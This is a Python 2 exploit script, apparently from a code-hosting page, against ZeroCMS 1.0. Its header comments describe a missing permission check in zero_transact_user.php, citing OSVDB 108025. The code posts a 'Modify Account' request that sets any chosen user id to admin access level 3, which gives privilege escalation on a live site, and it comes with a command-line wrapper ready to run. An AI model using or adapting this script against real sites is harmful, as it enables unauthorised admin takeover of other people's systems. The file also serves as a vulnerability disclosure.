53 lines
No EOL
1.8 KiB
Python
Executable file
53 lines
No EOL
1.8 KiB
Python
Executable file
import sys,getopt,cookielib,urllib2,urllib
|
|
|
|
# ZeroCMS 1.0
|
|
# zero_transact_user.php
|
|
# Impropper Form post hanling, (parameter polution)
|
|
# Vendor: Another Awesome Stuff
|
|
# Product web page: http://www.aas9.in/zerocms/
|
|
# author: tiago.alexand@gmail.com
|
|
# Tested on: php 5.4.27
|
|
# OSVDB ID: 108025
|
|
# description
|
|
# Summary: ZeroCMS is a very simple Content Management
|
|
# System built using PHP and MySQL.
|
|
# the script zero_transact_user.php contains a Modify Account case
|
|
# where the execution context doen't have in to consideration the current user's permitions
|
|
# allowing a malcious user to escalate its privileges to admin.
|
|
|
|
def exploit(host,email,name,userid):
|
|
access_level = 3 # default for admin
|
|
url = host + '/zero_transact_user.php' #the script handles user related actions
|
|
args = { 'user_id':userid,'email':email, 'name':name,'access_level':access_level,'action':'Modify Account' }
|
|
data = urllib.urlencode(args)
|
|
cj = cookielib.CookieJar()
|
|
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
|
|
response = opener.open(url,data);
|
|
print response.read()
|
|
|
|
def main(argv):
|
|
host = ''
|
|
email = ''
|
|
accountname = ''
|
|
userid = ''
|
|
try:
|
|
opts, args = getopt.getopt(argv,"hu:m:n:i:")
|
|
except getopt.GetoptError:
|
|
print 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'
|
|
sys.exit(2)
|
|
for opt, arg in opts:
|
|
if opt == '-h':
|
|
print 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'
|
|
sys.exit()
|
|
elif opt in ("-u"):
|
|
host = arg
|
|
elif opt in ("-m"):
|
|
email = arg
|
|
elif opt in ("-n"):
|
|
accountname = arg
|
|
elif opt in ("-i"):
|
|
userid = arg
|
|
exploit(host,email,accountname,userid)
|
|
|
|
if __name__ == "__main__":
|
|
main(sys.argv[1:]) |